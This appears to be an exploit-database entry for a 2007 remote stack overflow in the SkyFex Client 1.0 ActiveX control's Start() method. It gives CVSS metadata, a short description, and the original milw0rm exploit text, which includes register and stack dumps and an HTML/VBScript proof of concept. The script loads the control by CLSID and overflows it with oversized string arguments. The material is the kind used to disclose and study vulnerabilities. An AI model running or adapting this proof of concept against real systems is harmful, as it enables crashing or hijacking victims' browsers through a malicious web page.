SkyFex Client 1.0 "Start()" Method Remote Stack Overflow

vendor:

SkyFex Client

by:

shinnai

7.5

CVSS

HIGH

Remote Stack Overflow

Not mentioned

CWE

Product Name: SkyFex Client

Affected Version From: 1.0.2.77

Affected Version To: 1.0.2.77

Patch Exists: NO

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

Not mentioned

SkyFex Client 1.0 “Start()” Method Remote Stack Overflow

The SkyFex Client 1.0 software is vulnerable to a remote stack overflow exploit in the "Start()" method. An attacker can exploit this vulnerability by providing specially crafted input to the method, causing a stack overflow and potentially allowing the execution of arbitrary code. This vulnerability can be exploited remotely without authentication. The vulnerability affects version 1.0.2.77 of the SkyFexClient.ocx file. The exploit has been tested on Windows XP Professional SP2 with Internet Explorer 7.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to discontinue the use of the vulnerable software or implement additional security measures to protect against potential attacks.

Source

Exploit-DB raw data:

<pre>
<code><span style="font: 8pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
 <b>SkyFex Client 1.0 "Start()" Method Remote Stack Overflow</b>
 url: https://skyfex.com/

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 <b>Technical details:
 File: SkyFexClient.ocx
 Ver.: 1.0.2.77
 Codebase: https://skyfex.com//download/SkyFexClient.cab#Version=1,0,2,77
 Marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False</b>

 <b>Registers dump:</b>
 EAX 007B5A8C
 ECX 0164224C
 EDX 033E0024 UNICODE "DDDD..."
 EBX 00000000
 ESP 01735244 ASCII "EEE"
 EBP 0173F414 ASCII "$A"
 ESI 008A8A8C
 EDI 033E0024 UNICODE "DDDD..."
 EIP 02A995E5 SkyFexCl.02A995E5

 <b>Stack dump:</b>
 01735244   00454545  IEXPLORE.00454545
 01735248   02A60045  RETURN to SkyFexCl.02A60045 from SkyFexCl.02A995C0
 0173524C   43434343  urlmon.43434343
 01735250   43434343  urlmon.43434343
 01735254   43434343  urlmon.43434343
 01735258   43434343  urlmon.43434343
 0173525C   43434343  urlmon.43434343
 ...

 'Sub start (
 '     ByVal id_client  As String , 
 '     ByVal ip_server  As String , 
 ' 	ByVal text_ser  As String , 
 ' 	ByVal url_page  As String , 
 ' 	ByVal bDebug  As Integer 
 ' )
 
 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:F84E0B64-1E86-4640-8094-5B38CEB28C1E' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   id_client = String(16676, "A")
   ip_server = String(2000, "B")
   text_ser = String(2000, "C")
   url_page = String(4539717, "D")
   bDebug = 484
       
   test.start id_client, ip_server, text_ser, url_page, bDebug
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-12-28]